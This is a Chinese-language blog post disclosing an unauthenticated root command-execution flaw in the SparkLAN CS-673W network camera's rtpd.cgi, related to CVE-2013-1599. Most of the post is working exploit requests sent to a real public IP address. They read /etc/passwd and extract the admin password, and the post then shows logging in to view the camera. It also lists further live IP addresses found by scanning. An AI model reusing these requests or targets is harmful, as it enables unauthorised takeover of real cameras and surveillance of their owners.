高清电影_高清电视剧_热门资讯_Excel学习_迅雷电影下载_网络资源

首页|高清电影|Excel学习|高清剧场|学习交流|杂七杂八|网络资源|穿戴数码|热门资讯

SparkLAN网络摄像头CS-673W命令执行漏洞

 SparkLAN,台湾公司。


参考CVE-2013-1599,原漏洞主要涉及D-Link,本漏洞中的CS-673W同样中招,

该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。

 

1.查看/etc/passwd

http://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd



2.获取摄像头密码

http://183.179.253.135/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount



3.远程监控

拿到密码后,以用户名admin登陆http://183.179.253.135/
 

cam.png





4.如何证明这是通用?(漏洞特殊,请在漏洞确认后请删除该部分内容)

小范围扫描,可得:

http://59.149.83.240/

http://14.198.20.207/



……

Tags: | 2014/10/2 | 发表评论

Powered By Z-Blog